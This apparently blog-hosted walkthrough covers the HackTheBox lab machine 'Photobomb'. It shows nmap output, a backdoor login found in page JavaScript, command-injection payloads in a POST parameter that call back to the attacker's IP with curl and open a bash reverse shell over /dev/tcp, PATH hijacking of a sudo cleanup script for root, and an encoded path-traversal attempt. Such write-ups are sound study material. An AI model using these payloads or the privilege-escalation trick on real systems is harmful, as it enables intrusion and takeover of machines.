HackTheBox – Photobomb Write-up

Hi everyone! This write-up is on an easy Linux machine which focused on enumerating the webpage source for backdoor access to login to a webpage, using command injection vulnerability for initial access, and path hijacking via sudo for root privilege. Let’s get started!

1. Nmap enumeration

$ IP=10.10.11.182
$ sudo nmap -sC -sV -p- $IP
...
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 e2:24:73:bb:fb:df:5c:b5:20:b6:68:76:74:8a:b5:8d (RSA)
|   256 04:e3:ac:6e:18:4e:1b:7e:ff:ac:4f:e3:9d:d2:1b:ae (ECDSA)
|_  256 20:e0:5d:8c:ba:71:f0:8c:3a:18:19:f2:40:11:d2:9e (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://photobomb.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Based on the nmap result, we can see that the domain name is “photobomb.htb“.

2. Web enumeration

Firstly, we should add the domain name into the hosts file.

$ sudo nano /etc/hosts

In /etc/hosts:

127.0.0.1       localhost
127.0.1.1       kali
10.10.11.182    photobomb.htb
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters

Remember to change the IP address to your IP address. Once changed, we can visit the website via our browser.

If we click on “click here”, we will be prompted with a login pop-up.

2.1 Login backdoor

When looking at the main page’s source code, I went into photobomb.js and noticed there is a backdoor login URL provided that is used by tech support if they forget the login credentials.

Using the login URL, we will login into the dashboard.

2.1 Command injection via a web request parameter

Firstly, we will need to host a web server using Python.

$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Using burpsuite when we attempts to download a photo, we will intercept a POST request. Do a command injection to the filetype parameter to do a curl request back to our HTTP server and forward the request. Remember to change the IP to your own machine’s IP address. You will also need to URL-encode it. We should see that our HTTP server receive an incoming connection from the victim.

photo=voicu-apostol-MWER49YaD-M-unsplash.jpg&filetype=jpg | curl http://10.10.16.18&dimensions=3000x2000

2.2 Reverse shell

We can now get a reverse shell. Firstly, we will need to set a netcat listener.

nc -lvnp 443

Next, we can use burpsuite again for command injection to use bash reverse shell to connect to our netcat listener. Remember to URL-encode it.

photo=voicu-apostol-MWER49YaD-M-unsplash.jpg&filetype=jpg | /bin/bash -c 'bash -i >& /dev/tcp/10.10.16.18/443 0>&1'&dimensions=3000x2000

Our netcat should received a reverse shell. We can make it TTY.

$ nc -lvnp 443 
listening on [any] 443 ...
connect to [10.10.16.18] from (UNKNOWN) [10.10.11.182] 57482
bash: cannot set terminal process group (736): Inappropriate ioctl for device
bash: no job control in this shell
wizard@photobomb:~/photobomb$ python3 -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
wizard@photobomb:~/photobomb$ 

2.3 Get the user flag

wizard@photobomb:~/photobomb$ cd ~
cd ~
wizard@photobomb:~$ ls
ls
photobomb  user.txt
wizard@photobomb:~$ cat user.txt
cat user.txt
b5******************************
wizard@photobomb:~$ 

3. Privilege escalation

3.1 Sudo privilege

wizard@photobomb:~$ sudo -l
sudo -l
Matching Defaults entries for wizard on photobomb:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User wizard may run the following commands on photobomb:
    (root) SETENV: NOPASSWD: /opt/cleanup.sh

We can see that our current user have privileges to set the environment variable run the script as root.

3.2 Path hijacking

I first checked if the user has write permission to it. After discovering that it doesn’t, I printed the content of the script and noticed that it is vulnerable to path hijacking.

wizard@photobomb:~$ ls -l /opt/cleanup.sh
ls -l /opt/cleanup.sh
-r-xr-xr-x 1 root root 340 Sep 15 12:11 /opt/cleanup.sh
wizard@photobomb:~$ cat /opt/cleanup.sh
cat /opt/cleanup.sh
#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb

# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
  /bin/cat log/photobomb.log > log/photobomb.log.old
  /usr/bin/truncate -s0 log/photobomb.log
fi

# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;

I decided to hijack the find command by creating a malicious find file in the current user’s home directory that will spawn a shell. Since the file will be executed by root, the shell spawned will have root privileges. After changing the file’s permission to allow execution, I used sudo to run the script while setting the PATH to search for the current user’s home directory first for commands. As a result, this spawned a root shell.

wizard@photobomb:~$ echo "/bin/bash -p" > find
echo "/bin/bash -p" > find
wizard@photobomb:~$ chmod 777 find
chmod 777 find
wizard@photobomb:~$ pwd
pwd
/home/wizard
wizard@photobomb:~$ sudo PATH=/home/wizard:$PATH /opt/cleanup.sh
sudo PATH=/home/wizard:$PATH /opt/cleanup.sh
root@photobomb:/home/wizard/photobomb# 

3.3 Getting root flag

root@photobomb:/home/wizard/photobomb# cd ~  
cd ~
root@photobomb:~# ls
ls
root.txt
root@photobomb:~# cat root.txt
cat root.txt
ae******************************

4. Additional stuff

This section contains stuff that does not help us to get the flag but discover to let us know what methods are dead ends.

4.1 Local File Inclusion (LFI) not possible

Similarly, using burpsuite, I tried to fuzz the photo parameter by encoding a LFI path to passwd file with a NULL byte (cheatsheet from HackTricks).

photo=%252e%252e%252fetc%252fpasswd%00&filetype=jpg&dimensions=3000x2000

It should dump out an error. Expanding the first row, we will be able to see the partial source code that checks our filename. Note that there is a check for forward slash /, and double dots … This is to prevent file traversal. As a result, there is no way for us to bypass which means LFI is a rabbit hole.

I hope these tabs have been helpful to you. Feel free to leave any comments below. If you like my content, do follow me via email. You may also send me some tips if you like my work and want to see more of such content. Funds will mostly be used for my boba milk tea addiction. The link is here. 🙂

Advertisement

Leave a Reply

Please log in using one of these methods to post your comment:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.